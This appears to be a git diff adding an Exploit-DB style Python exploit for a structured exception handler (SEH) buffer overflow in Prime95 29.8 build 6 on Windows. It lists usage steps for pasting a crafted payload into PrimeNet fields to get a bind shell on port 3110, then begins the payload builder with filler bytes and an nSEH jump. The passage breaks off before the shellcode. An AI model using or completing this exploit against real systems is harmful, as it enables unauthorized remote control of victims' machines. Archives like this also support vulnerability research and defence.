diff --git a/exploits/windows/local/47802.py b/exploits/windows/local/47802.py new file mode 100755 index 000000000..65f6b89e7 --- /dev/null +++ b/exploits/windows/local/47802.py @@ -0,0 +1,65 @@ +# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH) +# Date: 2019-12-22 +# Vendor Homepage: https://www.mersenne.org +# Software Link: http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip +# Exploit Author: Achilles +# Tested Version: 29.8 build 6 +# Tested on: Windows 7 x64 + +# 1.- Run python code:Prime95.py +# 2.- Open EVIL.txt and copy content to Clipboard +# 3.- Open Prime95.exe go to PrimeNet +# 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name" +# 5.- Click Connection Paste the Content of EVIL.txt into the field "Option al proxy Host" +# 6.- Press ok Twice and you will have a bind shell port 3110 +# 7.- Greetings go:XiDreamzzXi,Metatron + +#!/usr/bin/env python + +import struct + +buffer =3D "\x41" * 660 +nseh =3D "\xeb\x06\x90\x90" #jmp short 6 +seh =3D struct.pack('